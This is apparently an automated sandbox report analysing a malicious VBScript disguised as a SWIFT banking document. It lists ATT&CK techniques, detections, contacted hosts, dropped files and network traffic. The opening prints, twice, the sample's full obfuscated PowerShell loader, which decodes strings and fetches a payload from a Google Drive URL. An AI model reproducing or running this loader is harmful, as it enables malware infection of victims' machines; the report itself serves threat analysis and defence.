Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$koldblodig = 1;$arbejdskatalogs119='substrin';$arbejdskatalogs119+='g';function hungerless($besnakkelsen){$phylloxerae=$besnakkelsen.length-$koldblodig;for($monsterhood=5; $monsterhood -lt $phylloxerae; $monsterhood+=(6)){$apadana+=$besnakkelsen.$arbejdskatalogs119.invoke($monsterhood, $koldblodig);}$apadana;}function toptekster($hypoglottis){& ($formode) ($hypoglottis);}$ahistoric=hungerless ' af,rm,ithsounconzdesigi,sperlsparelout,oadelim/ neur5armag.sinds0.nven tanta( flytw cramidriftntyphadsurreofueliw sammssek,u feathnbromdtskval bandc1over 0ejend. m.nn0,ooln;torde fishwdual ilaighnun.on6 pudr4stvfn;chrom stivexdebar6grsni4famul;dib e forudrkoralvoveri:ku ib1unawa2befar1s.lva.gri n0aeroc)jordo delkrginvaleguiltc loddkflueno skat/zooli2desme0milit1morib0biote0afdra1dicty0summa1 omni udtafsk lei notorsharpeuntonf dybso terexzo ie/ gdni1hyper2oscil1 tvr .pitch0palin ';$opvurderings=hungerless 'pro,huunexpsalthiebrugerv nys-overta pal ghlf,iefantan.uscut,craz ';$sadelmagervrkstedet=hungerless 'dekr.htaph tdemodtcir.epgrindssciss:fri s/kalci/leucrd sul,rforskita brvbrewsesrgef.sockmgaftllose geotransg tukalsupere alk..mercuc udg o.djunm plur/ fotoubeboecforsa?se,laesjuskxe,glipimmisochangrslukntkivin=haustd alleoma,ilw .unlnsyrinlsoluroejendas,ruedconti&,mfarimglerdb,han=fladb1mysidn florwsensaqshopplhaandxorrancoverlqlegenb sarasi,munlmo thzanap run crrnrtfofprotofstere6bespap g,ll4arsena multywhynepfasciklunkhp be,irspirauwasse2melleg,nsil0grund8.ombi-kr bsiectrotlag.i ';$inddelingens=hungerless ' insp>pi,na ';$formode=hungerless 'maalei ti,lesw epxsatel ';$unpark147='inferiority197';toptekster (hungerless 'ernris nonseforhat,aden- mi,rcobjeko h dfn hypntsupereaccornvarsetin,la super-mass.pslutnaapophtuntrahdek,n dragt unen:frilu\klitog brugi sablgsubsahnilleehakni. se,gtund sxlimstt h,ls mass-annyuv eneta tyrl k,onunonprepo er bourg$evovaubankrnromanpsjoveaskotsrurostku hum1broc,4marin7wishe;signa ');toptekster (hungerless 'pris.ifllesf.sbes udkra( kerot fewdehofdesmispotsnowm- fo.lptimw.aundebtwelteh all. suletetnol:delit\g rnigpendlibladfg i tehprocoehamul.colletbladexafsvrtp,rag)pr,ck{ur.erestepdxtypotifolket bord}myoso;rack, ');$lntillgs = hungerless 'longee.takncca,nohzooloo moor anded%neugraartisppremipwe,tedde roa bol.t belnabrdty% gibr\indtakt knoapyr prambilt frysodigitto.traesterikautoms fienk serro mbrerdis utlufttsha,nd.forsvvhemidr a,trd male ring&urbic&t.ecl telefe sproc,enneh ,ustoblesk vigor$sider ';toptekster (hungerless 'tar.a$flathgfiflkloutguowon,sbfelesaoverflcar,o:rneforburniatonefamet.odsystesquitcl torta stopaned.aesp,ratdatan=ca am( skrecradikmg.ssydperif afma/ottincjacke gylde$vitrilbely.nlucilt rangila.unl primlpreteg k.ics neot)rec t ');toptekster (hungerless ' ond$.lejlgo,poslpriksorestebspillaemballadept:fightvsmutve,ubstrtrad,mortogi avorl biceihackbnrnkeng pietue,ecteo,nersku st=be j
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$koldblodig = 1;$arbejdskatalogs119='substrin';$arbejdskatalogs119+='g';function hungerless($besnakkelsen){$phylloxerae=$besnakkelsen.length-$koldblodig;for($monsterhood=5; $monsterhood -lt $phylloxerae; $monsterhood+=(6)){$apadana+=$besnakkelsen.$arbejdskatalogs119.invoke($monsterhood, $koldblodig);}$apadana;}function toptekster($hypoglottis){& ($formode) ($hypoglottis);}$ahistoric=hungerless ' af,rm,ithsounconzdesigi,sperlsparelout,oadelim/ neur5armag.sinds0.nven tanta( flytw cramidriftntyphadsurreofueliw sammssek,u feathnbromdtskval bandc1over 0ejend. m.nn0,ooln;torde fishwdual ilaighnun.on6 pudr4stvfn;chrom stivexdebar6grsni4famul;dib e forudrkoralvoveri:ku ib1unawa2befar1s.lva.gri n0aeroc)jordo delkrginvaleguiltc loddkflueno skat/zooli2desme0milit1morib0biote0afdra1dicty0summa1 omni udtafsk lei notorsharpeuntonf dybso terexzo ie/ gdni1hyper2oscil1 tvr .pitch0palin ';$opvurderings=hungerless 'pro,huunexpsalthiebrugerv nys-overta pal ghlf,iefantan.uscut,craz ';$sadelmagervrkstedet=hungerless 'dekr.htaph tdemodtcir.epgrindssciss:fri s/kalci/leucrd sul,rforskita brvbrewsesrgef.sockmgaftllose geotransg tukalsupere alk..mercuc udg o.djunm plur/ fotoubeboecforsa?se,laesjuskxe,glipimmisochangrslukntkivin=haustd alleoma,ilw .unlnsyrinlsoluroejendas,ruedconti&,mfarimglerdb,han=fladb1mysidn florwsensaqshopplhaandxorrancoverlqlegenb sarasi,munlmo thzanap run crrnrtfofprotofstere6bespap g,ll4arsena multywhynepfasciklunkhp be,irspirauwasse2melleg,nsil0grund8.ombi-kr bsiectrotlag.i ';$inddelingens=hungerless ' insp>pi,na ';$formode=hungerless 'maalei ti,lesw epxsatel ';$unpark147='inferiority197';toptekster (hungerless 'ernris nonseforhat,aden- mi,rcobjeko h dfn hypntsupereaccornvarsetin,la super-mass.pslutnaapophtuntrahdek,n dragt unen:frilu\klitog brugi sablgsubsahnilleehakni. se,gtund sxlimstt h,ls mass-annyuv eneta tyrl k,onunonprepo er bourg$evovaubankrnromanpsjoveaskotsrurostku hum1broc,4marin7wishe;signa ');toptekster (hungerless 'pris.ifllesf.sbes udkra( kerot fewdehofdesmispotsnowm- fo.lptimw.aundebtwelteh all. suletetnol:delit\g rnigpendlibladfg i tehprocoehamul.colletbladexafsvrtp,rag)pr,ck{ur.erestepdxtypotifolket bord}myoso;rack, ');$lntillgs = hungerless 'longee.takncca,nohzooloo moor anded%neugraartisppremipwe,tedde roa bol.t belnabrdty% gibr\indtakt knoapyr prambilt frysodigitto.traesterikautoms fienk serro mbrerdis utlufttsha,nd.forsvvhemidr a,trd male ring&urbic&t.ecl telefe sproc,enneh ,ustoblesk vigor$sider ';toptekster (hungerless 'tar.a$flathgfiflkloutguowon,sbfelesaoverflcar,o:rneforburniatonefamet.odsystesquitcl torta stopaned.aesp,ratdatan=ca am( skrecradikmg.ssydperif afma/ottincjacke gylde$vitrilbely.nlucilt rangila.unl primlpreteg k.ics neot)rec t ');toptekster (hungerless ' ond$.lejlgo,poslpriksorestebspillaemballadept:fightvsmutve,ubstrtrad,mortogi avorl biceihackbnrnkeng pietue,ecteo,nersku st=be jJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
e-dekont_swift-details.vbs8%ReversingLabsScript-WScript.Trojan.Heuristic
e-dekont_swift-details.vbs11%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
drive.google.com
142.250.65.174
truefalse
    		high
    drive.usercontent.google.com
    		142.250.65.225
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://go.micro0powershell.exe, 00000002.00000002.2194313854.0000017EBBD4D000.00000004.00000800.00020000.00000000.sdmpfalse
        		unknown
        https://www.google.compowershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2194313854.0000017EBAED8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://drive.googPR2powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://drive.google.compowershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://drive.google.compowershell.exe, 00000002.00000002.2194313854.0000017EBCB97000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://apis.google.compowershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.65.174
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  142.250.65.225
                                  		drive.usercontent.google.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1430130
                                  Start date and time:2024-04-23 08:05:38 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 31s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:9
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:e-dekont_swift-details.vbs
                                  Detection:MAL
                                  Classification:mal100.expl.evad.winVBS@6/4@2/2
                                  EGA Information:Failed
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 1132 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  08:06:26API Interceptor43x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eTRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  72625413524.vbsGet hashmaliciousXWormBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  Shipping Document_PDF.vbsGet hashmaliciousUnknownBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225
                                  BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.65.174
                                  • 142.250.65.225

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllultnxj:NllU
                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:@...e................................................@..........

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02sxbdl5.imi.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wct10w.5d1.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Roaming\kartotekskorts.Vrd

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                  Category:dropped
                                  Size (bytes):1692
                                  Entropy (8bit):5.104847536630024
                                  Encrypted:false
                                  SSDEEP:24:hazsp4slvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pVmRq+fjsueFYaWJ
                                  MD5:431E9971F02B8A42CB4817FC3BB27192
                                  SHA1:BBBD7972B0D8142A88EA1210A68799F914C3F971
                                  SHA-256:20776F4A74F3ABF1592D140EB31A3D3B296E25C7E51A43D8B6F0EADABDC86119
                                  SHA-512:565F70DF91201637A7EBFA33BA633046DBA720103716F39D5641AEA5DCFAA3D0F7599A68354C920617317F47ADE454395173D5CBD7F39B5A1B588F19D50C0F8E
                                  Malicious:false
                                  Reputation:low
                                  Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="NJq9BtQepwJf6rPmYJMqnw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

                                  Static File Info

                                  General

                                  File type:ASCII text, with very long lines (355), with CRLF line terminators
                                  Entropy (8bit):5.350753385694196
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:e-dekont_swift-details.vbs
                                  File size:8'469 bytes
                                  MD5:0e0c52158e1cba6703c6456335cf228e
                                  SHA1:e79505cdd6282f492c37e632239f0a7fc8324bd4
                                  SHA256:fc7408dea9e0199b472661201fa866e1bf65e7a7d249b5b9e66f036efff85ab1
                                  SHA512:65cf187b7a63d407a04018323f5466e2b59c7af9a21329d78a6f58ce05884e0148745c9281e4442afd77a994880b101c02cf02655e543813f417a901f85a676d
                                  SSDEEP:192:i0V/UzHNP68NIss2XX5YiwLD1T9EFk8tvec171fz1eMtwYdos:pUzN6mIaaLQFNvei7/ev8
                                  TLSH:5A027D7CBB6231946E6B37390E5A90D4D9E501FFE15C6915F53C1381B002A1C704BFAE
                                  File Content Preview:.. ..Function Salmiaks14 ......W3 = W3 & "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterh

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 23, 2024 08:06:27.839684010 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:27.839730978 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:27.839809895 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:27.848156929 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:27.848170042 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.046112061 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.046363115 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:28.047208071 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.047266960 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:28.051444054 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:28.051450014 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.051688910 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.062952042 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:28.104119062 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.249488115 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.249821901 CEST44349699142.250.65.174192.168.2.6
                                  Apr 23, 2024 08:06:28.249875069 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:28.252088070 CEST49699443192.168.2.6142.250.65.174
                                  Apr 23, 2024 08:06:28.344535112 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:28.344587088 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:28.344655037 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:28.345406055 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:28.345421076 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:28.536273956 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:28.536351919 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:28.539360046 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:28.539371014 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:28.539755106 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:28.540647984 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:28.584120035 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:29.097103119 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:29.097161055 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:29.097223043 CEST44349700142.250.65.225192.168.2.6
                                  Apr 23, 2024 08:06:29.097337961 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:29.097337961 CEST49700443192.168.2.6142.250.65.225
                                  Apr 23, 2024 08:06:29.099706888 CEST49700443192.168.2.6142.250.65.225

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 23, 2024 08:06:27.744230032 CEST5371653192.168.2.61.1.1.1
                                  Apr 23, 2024 08:06:27.832860947 CEST53537161.1.1.1192.168.2.6
